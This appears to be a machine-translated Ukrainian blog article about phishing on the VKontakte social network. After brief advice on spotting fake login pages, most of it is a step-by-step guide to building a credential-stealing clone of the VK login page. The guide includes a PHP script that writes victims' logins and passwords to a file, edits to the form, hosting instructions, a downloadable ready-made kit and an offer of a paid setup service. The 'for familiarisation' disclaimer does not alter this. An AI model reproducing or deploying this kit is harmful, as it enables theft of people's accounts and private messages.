Фішинг вконтакте – як створити

У цій статті я розповім, що таке фішинг вконтакте. Як не попастися на фішингових сайтів, і не спалити свої облікові дані. Також наведу приклад створення такого сайту.

Що таке фішинг?

Взагалі слово fishing перекладається як рибалка. Фішинг – це підміна будь-якого сайту, на якому користувачі вводять облікові дані, такі як «логін» і «пароль», після чого перенаправляються на офіційний сайт, щоб не було підозр. А нехороша людина “редиска” дізнається ваші облікові дані, і може входити під вашим логіном на сайт.

Будьте уважними

Як вам можуть підсунути такий сайт, є кілька прикладів.

  1. На будь-якому ресурсі може бути посилання, в якій говориться: “додай мене в друзі і отримай за це 10 голосів вконтакте”. Погодьтеся, заманливо? Жертва переходить за цим посиланням, потрапляє на сайт начебто нічим не відрізняється від сайту вконтакте, вводить «логін» і «пароль». Потрапляє собі на сторінку, голосів не додалося. Довго думає і в підсумку забиває на цю справу, а дані від облікового запису вже у «редиски».
  2. Ваша дівчина або хлопець, дає вам посилання на сайт, з приводом лайкні Кота =) Ви без задньої думки переходите за посиланням, вводите «логін» і «пароль». І ваша друга половинка тепер знає ваші облікові дані, і зможе подивитися з ким це ви там спілкуєтеся =)

І ще купа варіантів, як можна заманити жертву на такий ось сайт.

Дивіться куди ви переходите, якщо ви сидите в даний момент в контакті і вам дають посилання, ви по ній переходите, бачите сторінку авторизації, у вас відразу ж повинно закрастися підозра. Зверніть увагу на адресу сайту. Припустимо вконтакте, адреса його: vk.com або vkontakte.ru. Не багато можуть запам’ятати довгі доменні імена сайтів, їх найлегше підробити. Я думаю через це соціальна мережа вконтакте, перейшла на такий короткий доменну адресу, щоб його було важче підробити. Якщо ви побачите адресу vk.org то ви особливо і не побачите підступу, якщо після нього чогось написати, наприклад: так взагалі адресу як адресу. Ну так от, якщо вас десь просять ввести пароль, перевіряйте уважно доменну адресу.

Створення фішинг сайту

Даний матеріал наводиться суто для ознайомлення, а не для ламання облікових записів своїх знайомих і друзів, також пам’ятаєте, що ця кримінальна справа.

І так наведу приклад створення фішингових сайту для соціальної мережі вконтакте.

Відкриваємо будь-який браузер, заходимо за адресою vk.com,

тиснемо файл => зберегти як =>

Файл: index.html

Тип файлу: Веб – сторінка, повністю з картинками. Тиснемо кнопку, Зберегти.

Тепер потрібно створити скрипт, який буде передавати дані введені в поле логін і пароль. Назвемо його icq.php

Відкриваємо блокнот і вставляємо туди цей код.

<?

$ Login = $ _POST [zabor]; // Логін жертви

$ Pass = $ _POST [ ‘zena’]; // Пароль жертви

$ Log = fopen ( “ups.php”, “a +”); // тут будуть лежати паролі жертв

fwrite ($ log, “<br> $ Login: $ Pass \ n “); // виробляємо запис в ups.php

fclose ($ log); // закриває ups.php

echo “<html><head><META HTTP-EQUIV = ‘Refresh’ content = ‘0; URL = http: //vkontakte.ru ‘></ head></ html>”; // перенаправляємо жертву на http://vk.com

?>

Закриваємо і зберігаємо як icq.php

Відкриваємо в блокноті файл, index.html. Відкриваємо пошук (ctrl + f) і вводимо <form тиснемо enter.

Він знайде рядок:

<FORM name = “login” id = “quick_login_form” onsubmit = “if (vklogin) {return true} else {quick_login (); return false;}” action = “https://login.vk.com/?act=login “method =” POST “>

Міняємо її на це:

<FORM name = “login” id = “quick_login_form” onsubmit = “if (vklogin) {return true} else {quick_login (); return false;}” action = “icq.php” method = “POST”>

Далі, дивимося трохи нижче і знаходимо рядок:

<INPUT name = “email” id = “quick_email” onfocus = “show’quick_expire ‘)” type = “text”>

Міняємо на це:

<INPUT name = “zabor” id = “quick_email” onfocus = “show ( ‘quick_expire’)” type = “text”>

Дивимося ще трохи нижче і знаходимо рядок:

<INPUT name = “pass” id = “quick_pass” onfocus = “show ( ‘quick_expire’)” type = “password”>

Міняємо на це:

<INPUT name = “zena” id = “quick_pass” onfocus = “show ( ‘quick_expire’)” type = “password”>

Далі необхідно кнопку «Увійти» включити в форму, щоб вона працювала, для цього, знаходимо трохи нижче закривається тег </ form>, Вирізаємо його і вставляємо його ось тут.

<DIV class = “button_blue button_wide”><BUTTON id = “quick_login_button”>Увійти</ BUTTON></ form></ DIV>

Зберігаємо index.html, і у вас в підсумку вийшло два файли файлу і одна папка. Далі все це справа потрібно буде залити на ваш хостинг. Ось цим https://beget.com можна місяць безкоштовно користуватися, можна купити на місяць, всього 150 гривень. Я думаю, ви вмієте це робити, якщо немає, задайте питання в коментарях.

Коли жертва зайде на вашу сторінку фішингову, введе «логін» і «пароль», у вас створите на хостингу ще один файл, ups.php в ньому і будуть зберігатися облікові записи.

Розповідь про те як залити все це справа на хостинг

висновок

У цій статті ви дізналися, як себе убезпечити і не попастися на фішингових сайтів. Як створити фішингових сайтів. Завантажити готовий, фішинг для вконтакте, можна нижче, для ознайомлювальних цілей.

(Adsbygoogle = window.adsbygoogle || []). Push ({});

Завантажити готовий фішингових сайтів для вконтакте.

Друзі, пройдіть опитування на тему які ще фішинг можна зробити і чи потрібні вони у нас в групі: https: //vk.com/27sysday

У зв’язку з великою кількістю звернень, вирішив створити послугу по настройці.

Ссылка на основную публикацию